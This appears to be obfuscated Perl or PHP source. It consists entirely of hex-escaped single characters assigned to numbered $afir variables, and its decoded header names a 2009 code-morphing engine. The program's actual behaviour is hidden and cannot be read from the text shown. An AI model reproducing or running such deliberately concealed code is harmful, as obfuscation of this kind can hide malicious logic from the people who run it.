$afir201="\x2c";
$afir1095="\x7d";$afir1364="\x24";$afir1365="\x69";$afir1076="\x0a";$afir884="\x24";$afir1261="\x32";$afir1297="\x20";$afir1600="\x63";$afir992="\x24";$afir493="\x62";
$afir841="\x76";$afir975="\x0a";$afir213="\x20";$afir977="\x7d";
$afir1138="\x32";$afir1581="\x0a";$afir557="\x65";$afir24="\x6f";
$afir223="\x6e";$afir433="\x70";
$afir971="\x20";$afir1643="\x2d";$afir139="\x75";$afir1160="\x20";
$afir1197="\x20";$afir291="\x68";$afir559="\x29";$afir1615="\x6f";$afir1361="\x6d";$afir1203="\x3b";$afir1392="\x73";$afir600="\x09";$afir622="\x28";$afir292="\x20";$afir1176="\x09";$afir186="\x6d";
$afir597="\x29";$afir1666="\x20";$afir766="\x20";$afir471="\x64";$afir1489="\x20";$afir77="\x65";$afir840="\x24";$afir1589="\x65";$afir1042="\x22";$afir153="\x0a";$afir62="\x6d";$afir1347="\x67";
$afir195="\x74";$afir1305="\x72";$afir1087="\x24";
$afir14="\x65";$afir567="\x3d";$afir319="\x3d";
$afir744="\x24";
$afir298="\x20";$afir526="\x79";$afir877="\x69";
$afir1563="\x69";$afir1217="\x20";$afir765="\x69";
$afir762="\x28";$afir1128="\x79";$afir917="\x24";$afir275="\x20";$afir586="\x61";
$afir413="\x0a";$afir348="\x29";
$afir1046="\x24";$afir1259="\x24";$afir416="\x09";$afir1037="\x61";
$afir691="\x78";$afir388="\x3b";$afir358="\x20";$afir1147="\x09";
$afir947="\x20";$afir1353="\x3b";
$afir52="\x73";$afir737="\x5d";
$afir467="\x66";
$afir1163="\x61";$afir1598="\x24";$afir202="\x20";
$afir353="\x09";$afir306="\x69";$afir1100="\x75";$afir1348="\x20";
$afir268="\x20";$afir1620="\x4f";
$afir857="\x20";$afir357="\x68";$afir1009="\x3b";$afir1380="\x20";$afir1101="\x62";
$afir407="\x24";
$afir32="\x65";$afir1370="\x3b";$afir169="\x66";$afir1590="\x74";
$afir1443="\x72";$afir105="\x74";$afir1198="\x2b";$afir216="\x3b";
$afir78="\x72";
$afir1405="\x69";
$afir1232="\x24";$afir965="\x29";
$afir939="\x20";$afir1660="\x72";
$afir1367="\x3d";
$afir1211="\x20";
$afir876="\x72";$afir1314="\x79";$afir1564="\x6e";$afir301="\x65";$afir2="\x6d";$afir879="\x74";$afir1379="\x3b";$afir173="\x09";
$afir1656="\x29";$afir1132="\x61";
$afir420="\x61";$afir827="\x24";
$afir628="\x30";$afir1257="\x09";$afir1202="\x29";$afir70="\x6e";$afir23="\x6d";$afir475="\x20";$afir1207="\x6e";$afir419="\x72";$afir352="\x09";$afir1627="\x61";$afir1278="\x24";
$afir1225="\x09";$afir795="\x09";$afir1308="\x67";$afir1676="\x65";$afir768="\x20";
$afir387="\x29";$afir110="\x73";$afir1238="\x5d";$afir591="\x74";$afir1089="\x63";$afir150="\x68";$afir621="\x20";$afir525="\x5f";$afir140="\x62";$afir1118="\x75";$afir1684="\x22";$afir982="\x63";
$afir362="\x72";$afir1020="\x65";$afir1595="\x70";$afir1642="\x65";
$afir796="\x7d";$afir801="\x20";$afir823="\x6e";$afir1447="\x73";$afir1029="\x3d";$afir1321="\x69";$afir327="\x3c";$afir371="\x73";$afir338="\x6f";
$afir1437="\x0a";
$afir393="\x75";$afir517="\x0a";
$afir833="\x20";$afir256="\x69";$afir42="\x20";$afir124="\x66";$afir1195="\x24";$afir118="\x61";$afir979="\x09";
$afir1010="\x22";$afir1354="\x0a";$afir443="\x6b";$afir5="\x65";$afir708="\x20";$afir1056="\x22";$afir1697="\x72";$afir1649="\x72";$afir20="\x64";$afir846="\x61";$afir57="\x20";$afir108="\x72";
$afir80="\x74";$afir86="\x20";$afir229="\x65";$afir1464="\x20";$afir593="\x69";
$afir415="\x0a";$afir574="\x76";$afir367="\x20";$afir1094="\x0a";$afir830="\x6f";$afir909="\x5f";
$afir48="\x53";$afir804="\x6c";
$afir1500="\x61";$afir82="\x6f";$afir1434="\x0a";$afir486="\x20";$afir1351="\x22";$afir1525="\x73";$afir203="\x40";$afir304="\x63";
$afir360="\x73";$afir172="\x0a";$afir1319="\x3d";$afir848="\x65";$afir95="\x23";$afir183="\x3b";$afir446="\x70";$afir1404="\x72";
$afir126="\x73";$afir83="\x6e";$afir174="\x6d";$afir143="\x65";
$afir948="\x25";$afir1435="\x09";$afir1131="\x24";$afir98="\x6c";
$afir540="\x5c";$afir793="\x3b";$afir580="\x6d";$afir1180="\x20";$afir715="\x65";$afir602="\x79";$afir1458="\x23";$afir1174="\x7b";$afir373="\x72";$afir675="\x22";
$afir170="\x74";$afir46="\x39";$afir1705="\x65";$afir1387="\x7b";$afir89="\x72";
$afir1282="\x24";
$afir614="\x22";
$afir403="\x65";$afir1512="\x20";$afir576="\x72";
$afir317="\x69";$afir913="\x65";
$afir271="\x20";$afir1294="\x73";$afir1289="\x0a";$afir1179="\x79";
$afir154="\x09";$afir1657="\x3b";$afir485="\x65";$afir321="\x30";$afir944="\x28";$afir1086="\x20";$afir1577="\x6c";$afir1668="\x6e";$afir1224="\x0a";$afir1669="\x63";$afir928="\x6f";$afir896="\x64";
$afir1153="\x6d";$afir294="\x75";
$afir900="\x3d";
$afir1444="\x6e";
$afir1523="\x6f";
$afir1318="\x20";$afir1550="\x69";$afir649="\x24";$afir1349="\x3d";$afir994="\x2e";
$afir958="\x64";
$afir635="\x3d";$afir349="\x20";$afir610="\x20";
$afir805="\x63";$afir890="\x09";$afir821="\x72";$afir1011="\x3b";$afir1546="\x64";$afir68="\x63";$afir753="\x20";$afir1494="\x6f";$afir1665="\x4f";$afir1316="\x24";$afir660="\x6f";$afir776="\x6e";
$afir748="\x64";
$afir754="\x22";
$afir556="\x78";$afir1117="\x68";$afir79="\x61";$afir92="\x6f";$afir1456="\x0a";$afir1663="\x74";$afir736="\x69";$afir1235="\x20";$afir1519="\x72";$afir1255="\x0a";$afir16="\x6c";$afir799="\x09";$afir911="\x61";$afir1267="\x24";$afir1473="\x73";
$afir694="\x3b";
$afir1210="\x74";$afir97="\x41";$afir1352="\x22";$afir1263="\x24";$afir1507="\x6d";$afir1053="\x2e";
$afir718="\x24";$afir428="\x20";$afir745="\x6d";
$afir398="\x69";$afir1169="\x24";$afir1691="\x2b";$afir1231="\x5b";$afir435="\x20";$afir956="\x61";$afir400="\x64";
$afir1439="\x72";$afir1503="\x23";
$afir1049="\x6f";$afir184="\x0a";$afir757="\x22";$afir270="\x66";$afir1035="\x5f";$afir278="\x61";$afir711="\x6e";$afir563="\x09";
$afir1618="\x6e";$afir210="\x73";
$afir862="\x3d";$afir639="\x73";
$afir1097="\x0a";$afir476="\x74";$afir344="\x2b";$afir1293="\x0a";$afir573="\x24";$afir511="\x20";
$afir1003="\x65";$afir1410="\x22";$afir238="\x65";$afir1637="\x72";$afir160="\x6f";$afir1205="\x09";$afir272="\x74";$afir921="\x3b";$afir151="\x0a";$afir838="\x5c";
$afir255="\x75";$afir562="\x0a";$afir925="\x24";$afir922="\x0a";$afir1113="\x65";$afir1315="\x20";$afir1015="\x24";
$afir1014="\x09";
$afir1686="\x63";$afir1603="\x0a";$afir712="\x64";$afir1528="\x72";$afir1707="\x61";$afir39="\x28";$afir165="\x20";$afir1054="\x3d";
$afir1461="\x68";$afir655="\x09";
$afir1374="\x20";$afir1601="\x29";
$afir690="\x32";$afir102="\x69";
$afir409="\x3b";$afir1275="\x61";$afir129="\x65";$afir1036="\x6e";$afir1441="\x74";$afir1673="\x6c";$afir1482="\x2c";$afir1044="\x0a";$afir425="\x69";
$afir1060="\x6c";
$afir697="\x20";
$afir1216="\x69";$afir680="\x25";
$afir901="\x20";
$afir159="\x63";$afir782="\x2b";$afir1008="\x22";$afir688="\x25";
$afir448="\x74";$afir964="\x31";$afir406="\x20";$afir1215="\x24";
$afir654="\x0a";$afir436="\x61";$afir661="\x64";$afir611="\x3d";$afir100="\x20";$afir232="\x25";$afir1268="\x6a";$afir1502="\x0a";$afir1149="\x6f";
$afir1112="\x74";$afir652="\x20";$afir1423="\x64";
$afir155="\x6d";$afir888="\x7b";$afir1408="\x66";$afir1073="\x3b";$afir76="\x6e";$afir247="\x29";$afir542="\x73";$afir1156="\x24";$afir1624="\x6d";$afir534="\x75";$afir1578="\x20";$afir631="\x24";$afir228="\x6d";$afir767="\x25";$afir1644="\x24";$afir252="\x23";$afir59="\x72";$afir673="\x66";$afir1540="\x74";
$afir873="\x23";$afir1104="\x69";$afir40="\x43";$afir537="\x6c";$afir836="\x20";
$afir455="\x6e";$afir819="\x73";$afir1194="\x28";$afir385="\x20";$afir1134="\x2c";
$afir313="\x72";
$afir1357="\x6f";$afir123="\x65";$afir854="\x66";
$afir663="\x20";$afir1699="\x74";$afir45="\x30";
$afir1135="\x20";
$afir115="\x64";$afir37="\x65";$afir302="\x20";$afir21="\x65";
$afir1085="\x6e";$afir10="\x72";
$afir1024="\x20";$afir1538="\x65";$afir1356="\x66";$afir883="\x2b";$afir1119="\x66";$afir480="\x20";$afir902="\x22";$afir1237="\x6a";$afir1571="\x6e";$afir863="\x20";$afir81="\x69";
$afir1075="\x3b";$afir1638="\x5f";$afir1337="\x09";$afir1192="\x6e";$afir1292="\x0a";$afir1384="\x69";
$afir1161="\x40";$afir891="\x09";$afir1462="\x69";$afir897="\x65";$afir1685="\x6e";$afir1658="\x0a";$afir1077="\x09";$afir1240="\x3d";$afir1102="\x20";$afir1654="\x6e";$afir752="\x3d";$afir764="\x24";
$afir656="\x09";$afir605="\x6d";$afir839="\x24";$afir36="\x6e";$afir717="\x5b";$afir1490="\x79";
$afir1597="\x28";$afir1007="\x2e";$afir290="\x63";$afir829="\x63";
$afir548="\x2c";$afir498="\x20";$afir527="\x61";
$afir1414="\x2c";$afir1148="\x66";$afir1005="\x24";
$afir1311="\x0a";$afir918="\x69";$afir880="\x3b";$afir535="\x66";$afir488="\x61";$afir961="\x30";$afir374="\x28";$afir1485="\x65";
$afir771="\x6e";$afir1570="\x6f";$afir442="\x20";$afir1682="\x63";
$afir1298="\x72";$afir220="\x73";$afir978="\x0a";$afir668="\x70";$afir871="\x20";$afir869="\x20";$afir273="\x68";$afir952="\x6e";$afir1504="\x20";$afir182="\x30";$afir472="\x0a";$afir1703="\x3b";$afir164="\x3d";$afir999="\x5f";$afir1693="\x67";$afir1317="\x6c";
$afir303="\x73";$afir454="\x6f";$afir903="\x5c";$afir242="\x61";$afir664="\x2e";$afir942="\x20";$afir206="\x64";
$afir803="\x61";$afir239="\x6e";$afir369="\x75";$afir426="\x7a";$afir1256="\x09";$afir1068="\x5f";$afir1632="\x68";$afir864="\x30";$afir1341="\x24";
$afir719="\x69";$afir1338="\x6d";$afir845="\x6e";$afir1332="\x29";$afir1093="\x3b";$afir987="\x2e";$afir682="\x3d";$afir308="\x74";$afir1409="\x28";$afir1531="\x6f";$afir1527="\x6f";$afir1201="\x29";
$afir923="\x09";
$afir320="\x20";$afir1041="\x3b";$afir1236="\x24";$afir1002="\x6d";$afir1428="\x2b";
$afir1647="\x6e";$afir822="\x69";
$afir809="\x74";
$afir1331="\x29";$afir1613="\x3b";$afir334="\x68";$afir265="\x72";$afir872="\x24";$afir1498="\x20";
$afir1522="\x69";$afir1547="\x65";$afir71="\x73";$afir1143="\x40";$afir464="\x73";$afir1472="\x72";$afir785="\x29";$afir881="\x20";$afir395="\x68";
$afir1324="\x28";$afir1645="\x67";$afir1694="\x65";$afir1689="\x0a";
$afir728="\x73";$afir65="\x0a";$afir1204="\x0a";$afir205="\x6e";
$afir916="\x22";
$afir1129="\x20";$afir1491="\x6f";$afir1173="\x20";$afir177="\x24";$afir1636="\x61";$afir1715="\x0a";$afir456="\x20";$afir720="\x5d";
$afir1251="\x24";$afir1640="\x61";
$afir1506="\x6f";$afir339="\x64";$afir112="\x72";$afir1710="\x24";$afir1277="\x5b";
$afir1001="\x61";$afir966="\x29";
$afir1594="\x72";$afir579="\x61";$afir761="\x20";$afir51="\x61";$afir545="\x69";$afir483="\x20";$afir1182="\x6a";$afir1440="\x65";
$afir137="\x0a";$afir572="\x09";
$afir594="\x6e";$afir855="\x6f";$afir1079="\x09";$afir1701="\x6f";
$afir1213="\x66";$afir1634="\x24";$afir1612="\x63";
$afir1449="\x72";$afir432="\x69";$afir224="\x64";$afir587="\x6e";$afir1672="\x63";$afir133="\x73";
$afir1155="\x20";$afir679="\x73";$afir1617="\x65";
$afir882="\x2b";$afir528="\x74";
$afir714="\x78";$afir787="\x20";$afir907="\x61";
$afir1381="\x2b";$afir1401="\x20";$afir136="\x2e";$afir1487="\x6e";
$afir1285="\x3b";$afir1652="\x69";$afir1397="\x67";
$afir399="\x6e";$afir1459="\x20";
$afir596="\x28";$afir784="\x29";
$afir501="\x72";$afir1535="\x69";$afir1369="\x30";$afir470="\x65";$afir1218="\x3d";$afir283="\x65";$afir1422="\x6e";$afir696="\x2c";$afir1142="\x20";$afir116="\x2c";$afir9="\x61";$afir974="\x3b";$afir938="\x22";$afir1383="\x24";
$afir380="\x2c";$afir1326="\x61";
$afir1526="\x20";$afir1043="\x3b";$afir831="\x64";$afir381="\x20";$afir558="\x73";$afir375="\x24";
$afir603="\x20";$afir481="\x73";$afir1018="\x6f";$afir457="\x68";
$afir1310="\x7b";$afir589="\x5f";
$afir1325="\x72";$afir616="\x0a";$afir497="\x64";$afir683="\x5c";
$afir1334="\x32";$afir646="\x20";
$afir1418="\x74";$afir363="\x69";
$afir1569="\x70";$afir843="\x72";
$afir1555="\x20";$afir687="\x78";
$afir114="\x65";$afir887="\x20";
$afir1048="\x63";$afir1567="\x65";$afir959="\x28";
$afir1105="\x73";$afir376="\x63";$afir732="\x70";$afir1664="\x20";
$afir142="\x6d";$afir783="\x31";$afir1532="\x2c";
$afir221="\x72";$afir1524="\x6e";$afir552="\x69";$afir4="\x72";$afir1575="\x69";$afir1573="\x6e";
$afir647="\x2b";$afir1136="\x24";
$afir1071="\x6d";
$afir749="\x65";$afir658="\x6d";$afir1133="\x31";$afir800="\x23";$afir350="\x7b";$afir1137="\x61";$afir1576="\x61";$afir861="\x20";$afir1480="\x64";$afir832="\x65";$afir1030="\x27";$afir149="\x70";$afir1513="\x34";$afir1509="\x75";$afir1109="\x5f";$afir8="\x65";$afir1266="\x20";$afir461="\x77";$afir251="\x09";$afir218="\x0a";$afir515="\x65";
$afir132="\x72";$afir617="\x09";
$afir85="\x31";$afir18="\x63";$afir122="\x6c";$afir1521="\x74";
$afir1427="\x29";$afir532="\x73";$afir595="\x67";$afir1714="\x0a";
$afir1243="\x24";$afir758="\x20";$afir1274="\x24";$afir262="\x20";$afir248="\x3b";
$afir264="\x72";$afir760="\x66";$afir1641="\x6d";
$afir1451="\x6e";$afir677="\x24";$afir1608="\x74";$afir91="\x69";$afir886="\x29";$afir384="\x2c";
$afir1395="\x69";
$afir287="\x77";$afir1593="\x6f";$afir1181="\x24";
$afir217="\x0a";$afir1551="\x7a";$afir950="\x28";$afir449="\x72";$afir1553="\x0a";$afir1499="\x63";$afir1000="\x6e";$afir241="\x72";$afir1164="\x31";
$afir161="\x64";$afir189="\x40";
$afir1416="\x69";$afir1320="\x20";$afir337="\x63";$afir368="\x73";$afir1106="\x68";
$afir1648="\x65";$afir333="\x74";$afir1081="\x65";$afir524="\x72";$afir1188="\x74";$afir1226="\x09";$afir469="\x6c";$afir643="\x70";
$afir176="\x20";$afir516="\x72";$afir1055="\x20";$afir281="\x63";$afir684="\x22";$afir293="\x62";$afir513="\x61";
$afir1631="\x70";$afir828="\x6d";$afir445="\x65";$afir314="\x20";$afir569="\x30";$afir638="\x23";$afir506="\x20";$afir1385="\x29";$afir1606="\x69";$afir623="\x24";$afir434="\x74";$afir144="\x74";$afir814="\x61";$afir627="\x20";$afir441="\x2c";
$afir522="\x68";
$afir1157="\x69";$afir1431="\x29";$afir1486="\x61";
$afir554="\x64";$afir724="\x72";$afir1242="\x40";$afir1446="\x24";$afir681="\x64";$afir260="\x61";$afir1363="\x20";
$afir702="\x5f";
$afir200="\x29";$afir1295="\x75";
$afir750="\x20";$afir934="\x20";
$afir237="\x67";$afir788="\x3d";$afir584="\x20";$afir482="\x6f";
$afir898="\x20";$afir1583="\x6e";$afir452="\x6b";$afir1103="\x66";$afir1110="\x79";$afir899="\x2e";$afir1074="\x22";$afir288="\x68";$afir138="\x73";$afir1158="\x20";$afir1566="\x20";$afir1430="\x37";$afir1478="\x63";$afir849="\x3d";$afir1592="\x6d";$afir859="\x24";$afir1368="\x20";$afir491="\x72";$afir759="\x69";$afir462="\x65";$afir1675="\x73";$afir466="\x75";$afir678="\x25";$afir1548="\x2d";$afir634="\x3c";$afir323="\x20";$afir1452="\x67";$afir152="\x7b";$afir7="\x70";$afir193="\x69";
$afir1586="\x3d";$afir609="\x65";$afir254="\x62";$afir727="\x24";$afir725="\x64";
$afir1344="\x72";$afir342="\x3b";$afir983="\x6f";$afir1706="\x76";$afir1396="\x6e";$afir1646="\x65";$afir575="\x61";$afir1304="\x74";$afir226="\x74";$afir669="\x72";$afir227="\x69";$afir549="\x20";$afir997="\x61";
$afir131="\x65";$afir277="\x68";
$afir1611="\x6e";$afir781="\x29";$afir484="\x77";$afir1022="\x2e";$afir1322="\x6e";$afir194="\x70";
$afir286="\x20";$afir1518="\x65";$afir211="\x20";
$afir588="\x64";$afir1122="\x65";$afir1695="\x6e";$afir1621="\x2c";$afir733="\x74";$afir1116="\x73";$afir1469="\x65";$afir541="\x40";$afir775="\x61";$afir44="\x30";$afir1455="\x7d";
$afir568="\x20";
$afir1696="\x65";$afir1679="\x3b";$afir926="\x6d";$afir686="\x5c";$afir509="\x64";$afir910="\x6e";$afir1221="\x24";$afir741="\x0a";$afir13="\x50";
$afir326="\x20";$afir121="\x20";$afir1124="\x7b";$afir1162="\x24";$afir1186="\x69";$afir1457="\x0a";
$afir246="\x6e";$afir1438="\x09";$afir1445="\x20";$afir487="\x63";$afir1="\x20";$afir450="\x61";$afir1514="\x20";$afir477="\x68";
$afir692="\x5c";$afir1023="\x3d";
$afir1545="\x6f";$afir667="\x73";
$afir167="\x68";$afir316="\x24";$afir1492="\x75";
$afir1206="\x09";$afir1556="\x69";$afir394="\x73";
$afir529="\x65";$afir856="\x72";$afir1032="\x76";
$afir837="\x22";
$afir1477="\x20";$afir637="\x24";$afir566="\x20";$afir1027="\x24";$afir1688="\x3b";$afir1145="\x3b";$afir1272="\x20";$afir389="\x0a";$afir1371="\x20";$afir1537="\x63";
$afir1281="\x20";$afir914="\x22";
$afir1653="\x6f";$afir1333="\x2b";$afir1017="\x63";$afir954="\x28";$afir1228="\x24";$afir645="\x3b";$afir234="\x24";$afir640="\x63";$afir430="\x63";$afir15="\x72";
$afir19="\x6f";$afir703="\x6e";$afir1602="\x3b";$afir755="\x5c";$afir1467="\x20";$afir422="\x64";$afir1454="\x0a";$afir653="\x7b";$afir1419="\x28";
$afir1585="\x20";$afir263="\x61";$afir632="\x69";
$afir465="\x68";$afir93="\x6e";$afir1021="\x20";$afir146="\x6d";$afir503="\x65";$afir1376="\x20";
$afir521="\x73";$afir931="\x20";$afir1402="\x73";$afir604="\x24";
$afir198="\x20";$afir585="\x72";$afir361="\x63";$afir817="\x29";$afir1249="\x2c";$afir427="\x65";$afir802="\x63";$afir53="\x74";$afir120="\x6c";$afir1373="\x69";$afir328="\x20";$afir531="\x5f";$afir50="\x62";$afir318="\x20";$afir312="\x6f";$afir1390="\x09";$afir1398="\x20";$afir1313="\x6d";$afir868="\x69";$afir813="\x76";
$afir726="\x28";$afir1389="\x09";$afir1254="\x3b";$afir808="\x61";
$afir439="\x61";$afir734="\x5b";$afir1622="\x22";$afir365="\x74";
$afir555="\x65";$afir1529="\x20";
$afir1246="\x5b";$afir1330="\x33";$afir716="\x73";$afir699="\x76";
$afir624="\x69";$afir168="\x69";
$afir1098="\x0a";$afir1303="\x73";$afir157="\x20";$afir930="\x65";$afir1209="\x78";$afir1296="\x62";$afir166="\x73";$afir496="\x6c";$afir453="\x20";$afir536="\x66";$afir279="\x72";$afir1350="\x20";
$afir383="\x69";$afir1680="\x0a";$afir1279="\x6a";$afir929="\x64";$afir1386="\x20";$afir1536="\x6e";
$afir707="\x2c";$afir1171="\x3b";$afir402="\x78";$afir35="\x69";$afir1355="\x09";$afir1687="\x22";
$afir175="\x79";$afir405="\x2c";$afir731="\x69";$afir1185="\x20";$afir701="\x72";$afir250="\x0a";$afir618="\x66";
$afir1346="\x6e";$afir970="\x3d";$afir723="\x6f";$afir1114="\x73";$afir1302="\x5f";$afir963="\x2b";
$afir88="\x65";
$afir459="\x77";$afir1651="\x74";$afir1388="\x0a";$afir1541="\x68";
$afir1345="\x69";$afir973="\x29";
$afir1283="\x69";$afir510="\x65";$afir128="\x72";$afir949="\x20";$afir460="\x20";
$afir946="\x69";$afir512="\x6c";$afir377="\x6f";$afir17="\x20";$afir1059="\x61";$afir1394="\x72";$afir972="\x30";$afir1183="\x20";
$afir171="\x3b";$afir807="\x6c";$afir1709="\x20";$afir60="\x61";$afir396="\x20";$afir1429="\x39";$afir1214="\x20";$afir834="\x2e";$afir1208="\x65";$afir379="\x65";$afir478="\x65";$afir1336="\x0a";$afir1508="\x70";$afir514="\x74";$afir989="\x20";
$afir1574="\x74";$afir607="\x6f";$afir1190="\x72";$afir332="\x67";$afir592="\x72";
$afir30="\x67";$afir816="\x28";$afir1599="\x24";$afir773="\x28";
$afir874="\x73";$afir1229="\x61";$afir444="\x65";$afir253="\x20";$afir1565="\x67";$afir1151="\x20";$afir685="\x5c";$afir22="\x20";$afir75="\x65";$afir570="\x3b";$afir43="\x32";
$afir214="\x28";$afir1212="\x69";$afir1400="\x3d";$afir671="\x6e";$afir1058="\x76";$afir1323="\x74";$afir1609="\x20";$afir1704="\x0a";$afir324="\x24";$afir72="\x74";$afir1248="\x6a";$afir1090="\x6f";$afir1172="\x29";
$afir107="\x20";$afir1360="\x28";$afir893="\x6d";$afir1558="\x20";$afir806="\x75";$afir258="\x64";$afir447="\x20";
$afir1329="\x28";$afir629="\x3b";
$afir553="\x6e";$afir458="\x6f";$afir955="\x72";$afir1700="\x69";$afir322="\x3b";$afir1554="\x23";$afir1470="\x63";$afir1170="\x69";
$afir197="\x3d";$afir1140="\x20";$afir1559="\x67";$afir810="\x65";$afir756="\x6e";
$afir1655="\x22";
$afir1168="\x2d";$afir1549="\x73";$afir196="\x20";
$afir1327="\x6e";$afir824="\x67";$afir340="\x65";$afir325="\x69";$afir451="\x63";$afir47="\x20";$afir1375="\x3c";$afir311="\x66";$afir490="\x20";$afir571="\x0a";$afir1496="\x6c";$afir648="\x2b";$afir63="\x65";
$afir418="\x20";$afir976="\x09";$afir315="\x28";$afir1286="\x0a";$afir73="\x20";$afir1584="\x63";
$afir1604="\x70";$afir1004="\x2e";
$afir1623="\x3e";$afir644="\x74";
$afir1670="\x3b";$afir1391="\x24";$afir730="\x72";$afir156="\x79";$afir90="\x73";$afir84="\x2d";
$afir1265="\x2c";$afir397="\x40";
$afir240="\x65";$afir1139="\x29";
$afir851="\x3b";
$afir1127="\x6d";$afir676="\x5c";$afir101="\x72";
$afir87="\x76";
$afir1200="\x31";$afir309="\x0a";$afir431="\x72";$afir1539="\x20";$afir951="\x69";$afir704="\x61";$afir1233="\x69";$afir474="\x23";$afir1713="\x3b";$afir249="\x0a";$afir1678="\x4f";
$afir1309="\x0a";$afir55="\x61";$afir826="\x09";$afir284="\x72";$afir359="\x40";$afir329="\x6c";$afir378="\x64";$afir1271="\x3d";$afir998="\x72";$afir996="\x76";$afir1150="\x72";$afir919="\x2e";
$afir577="\x5f";$afir1219="\x3d";$afir245="\x6f";$afir1288="\x7d";$afir1343="\x74";$afir500="\x6f";
$afir1061="\x20";$afir392="\x70";$afir705="\x6d";$afir915="\x2e";$afir346="\x24";$afir1026="\x5c";$afir539="\x28";$afir1141="\x3d";$afir243="\x74";
$afir267="\x79";$afir366="\x2c";$afir1034="\x72";
$afir336="\x24";$afir1227="\x40";$afir1562="\x77";$afir1108="\x72";$afir94="\x0a";$afir1591="\x61";$afir299="\x74";$afir502="\x72";$afir6="\x2d";$afir3="\x6f";$afir1560="\x72";$afir1639="\x6e";$afir1270="\x20";$afir1175="\x0a";
$afir61="\x68";$afir111="\x65";$afir207="\x65";$afir505="\x74";$afir1415="\x20";$afir1413="\x22";$afir1436="\x7d";$afir1420="\x72";$afir666="\x20";$afir520="\x69";$afir747="\x6f";$afir192="\x72";$afir818="\x20";$afir865="\x3b";
$afir988="\x3d";$afir495="\x69";$afir601="\x6d";$afir1433="\x3b";$afir1690="\x2b";$afir777="\x64";$afir1241="\x20";$afir565="\x69";
$afir1253="\x5d";$afir1239="\x20";$afir1614="\x0a";$afir1307="\x6e";$afir659="\x63";$afir895="\x6f";
$afir1290="\x7d";$afir66="\x23";$afir28="\x69";$afir598="\x3b";$afir935="\x22";$afir599="\x0a";
$afir1372="\x24";
$afir738="\x29";$afir11="\x6c";$afir382="\x24";$afir1082="\x74";$afir1033="\x61";$afir109="\x65";
$afir1493="\x20";$afir1072="\x65";$afir280="\x61";$afir606="\x63";$afir135="\x64";$afir1425="\x32";$afir1120="\x66";$afir199="\x28";$afir1070="\x61";
$afir259="\x20";$afir1671="\x0a";$afir937="\x6e";
$afir225="\x28";$afir1301="\x64";$afir163="\x20";$afir1184="\x3d";$afir1260="\x61";
$afir1488="\x73";$afir473="\x09";
$afir162="\x65";$afir924="\x09";$afir905="\x24";$afir906="\x76";$afir113="\x76";$afir386="\x31";$afir518="\x09";$afir578="\x6e";$afir257="\x6c";$afir1403="\x70";$afir1199="\x20";$afir1702="\x6e";$afir1520="\x61";
$afir1244="\x61";
$afir1312="\x09";$afir404="\x73";$afir222="\x61";$afir41="\x29";
$afir912="\x6d";$afir499="\x63";$afir74="\x67";$afir468="\x66";
$afir364="\x70";
$afir867="\x24";
$afir815="\x6c";$afir1262="\x5b";$afir1533="\x20";$afir1019="\x64";
$afir282="\x74";$afir1250="\x20";$afir1681="\x24";
$afir657="\x24";$afir1629="\x6f";$afir984="\x64";
$afir746="\x63";$afir130="\x76";$afir1378="\x6c";$afir1196="\x69";$afir49="\x65";$afir1287="\x09";
$afir1596="\x68";$afir709="\x24";
$afir894="\x63";
$afir1557="\x73";$afir1123="\x0a";
$afir401="\x65";$afir1146="\x0a";$afir424="\x6d";
$afir613="\x22";$afir421="\x6e";$afir1510="\x74";$afir125="\x74";
$afir962="\x29";$afir1096="\x0a";$afir1280="\x2c";$afir853="\x09";$afir1362="\x79";$afir1258="\x40";
$afir1167="\x2d";
$afir335="\x28";$afir1626="\x74";$afir564="\x24";$afir1610="\x24";
$afir295="\x69";$afir1406="\x6e";$afir106="\x73";
$afir1284="\x5d";
$afir792="\x29";$afir875="\x63";$afir1045="\x09";$afir437="\x72";$afir967="\x29";$afir1530="\x73";$afir429="\x73";$afir729="\x63";
$afir860="\x69";$afir550="\x5c";$afir943="\x28";$afir1432="\x29";$afir209="\x65";$afir1130="\x28";$afir178="\x69";$afir1152="\x28";$afir269="\x6f";
$afir1080="\x72";$afir1006="\x69";$afir820="\x74";$afir590="\x73";$afir1091="\x64";$afir612="\x20";$afir1126="\x09";$afir1579="\x3a";
$afir778="\x28";$afir119="\x6c";$afir1421="\x61";$afir674="\x28";$afir713="\x65";$afir1450="\x69";
$afir1659="\x70";$afir187="\x79";
$afir1099="\x73";$afir148="\x72";$afir608="\x64";
$afir1339="\x79";
$afir847="\x6d";$afir969="\x3d";$afir722="\x20";$afir1633="\x2d";$afir763="\x28";
$afir489="\x6e";$afir650="\x69";$afir1016="\x6d";
$afir307="\x70";$afir54="\x69";
$afir1424="\x28";$afir651="\x29";$afir1291="\x0a";$afir770="\x69";$afir1193="\x64";$afir26="\x70";$afir185="\x09";
$afir790="\x20";$afir774="\x72";$afir1154="\x79";$afir285="\x73";$afir0="\x23";$afir1247="\x24";$afir980="\x24";$afir391="\x09";$afir58="\x4b";$afir180="\x3d";$afir331="\x6e";$afir1475="\x76";$afir1605="\x72";$afir932="\x2e";$afir117="\x20";
$afir356="\x73";$afir1582="\x24";$afir1039="\x65";$afir411="\x09";$afir414="\x0a";$afir941="\x66";$afir1069="\x6e";$afir29="\x6e";$afir892="\x24";$afir310="\x09";$afir1561="\x6f";$afir544="\x72";
$afir995="\x24";$afir1712="\x63";$afir1358="\x72";$afir274="\x65";$afir1115="\x5f";$afir940="\x69";
$afir551="\x40";$afir127="\x20";$afir236="\x24";
$afir479="\x6d";$afir1040="\x27";$afir141="\x20";$afir1340="\x20";$afir1012="\x0a";$afir968="\x20";
$afir791="\x30";
$afir1619="\x28";$afir179="\x20";$afir355="\x75";$afir878="\x70";$afir1588="\x6d";$afir1062="\x5c";$afir530="\x73";$afir1052="\x20";$afir953="\x74";$afir1050="\x64";$afir1662="\x6e";$afir1166="\x20";$afir1399="\x2e";$afir560="\x3b";$afir1484="\x6d";$afir440="\x79";$afir134="\x65";$afir797="\x0a";$afir858="\x28";$afir1159="\x3d";$afir825="\x0a";$afir798="\x0a";$afir533="\x68";$afir1220="\x20";$afir811="\x20";$afir957="\x6e";
$afir69="\x6f";$afir960="\x32";$afir1393="\x74";$afir665="\x3d";$afir370="\x62";$afir620="\x72";$afir96="\x20";$afir1692="\x24";$afir985="\x65";$afir740="\x3b";$afir920="\x22";$afir408="\x69";
$afir991="\x5c";$afir693="\x22";$afir583="\x3d";$afir305="\x72";$afir1067="\x72";$afir504="\x63";$afir1299="\x61";$afir1382="\x2b";$afir276="\x63";$afir215="\x29";$afir56="\x6e";$afir1269="\x5d";$afir1222="\x6a";
